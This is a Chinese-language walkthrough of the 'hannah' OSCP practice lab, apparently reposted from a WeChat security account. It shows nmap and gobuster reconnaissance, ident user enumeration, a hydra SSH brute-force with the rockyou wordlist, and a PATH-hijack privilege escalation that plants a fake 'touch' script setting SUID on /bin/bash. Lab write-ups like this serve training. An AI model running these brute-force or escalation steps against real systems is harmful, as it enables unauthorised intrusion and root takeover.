OSCP 靶场
靶场介绍
|
hannah |
easy |
ident、hydra 爆破、路径劫持 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 04:11 EST
Nmap scan report for 192.168.1.64
Host is up (0.00073s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey:
| 3072 5f:1c:78:36:99:05:32:09:82:d3:d5:05:4c:14:75:d1 (RSA)
| 256 06:69:ef:97:9b:34:d7:f3:c7:96:60:d1:a1:ff:d8:2c (ECDSA)
|_ 256 85:3d:da:74:b2:68:4e:a6:f7:e5:f5:85:40:90:2e:9a (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 1 disallowed entry
|_/enlightenment
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
|_auth-owners: moksha
113/tcp open ident?
|_auth-owners: root
MAC Address: 08:00:27:30:15:71 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.73 ms 192.168.1.64
目录扫描
──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.64 -x html,txt,php -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.64
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.64/index.html (Status: 200) [Size: 19]
http://192.168.1.64/robots.txt (Status: 200) [Size: 25]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
权限获取
使用ident-user-enum脚本对ident 进行枚举,我们也可以直接使用nmap进行扫描
ident-user-enum 是一个简单的 PERL 脚本,用于查询 ident 服务 (113/TCP),以确定侦听目标系统的每个 TCP 端口的进程的所有者。
https://github.com/pentestmonkey/ident-user-enum我们最后拿moksha和root 账户对 ssh 进行爆破。
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey:
| 3072 5f:1c:78:36:99:05:32:09:82:d3:d5:05:4c:14:75:d1 (RSA)
| 256 06:69:ef:97:9b:34:d7:f3:c7:96:60:d1:a1:ff:d8:2c (ECDSA)
|_ 256 85:3d:da:74:b2:68:4e:a6:f7:e5:f5:85:40:90:2e:9a (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 1 disallowed entry
|_/enlightenment
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
|_auth-owners: moksha
113/tcp open ident?
|_auth-owners: roothydra -l moksha -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.64
权限提升
crontab 发现,/tmp下有执行脚本
查看该脚本是空的,而且我们也没有权限写入
任务计划中还使用了touch 命令,我们查看到media 具有写入的条件并且该目录位于 root 的 PATH 中。
那么我们尝试路径劫持,因为脚本中未指定“touch”命令的完整路径,还有 “/media”目录位于“/usr/bin”之前。
在media 目录下创建一个touch 文件,内容如下。
$ touch /media/touch
$ chmod +x /media/touch
$ cat /media/touch
#!/bin/bash
chmod +s /bin/bash等待一分钟后,/bash 已经具有suid 权限了。那么我们直接使用bash 进行提权。
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】hannah
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论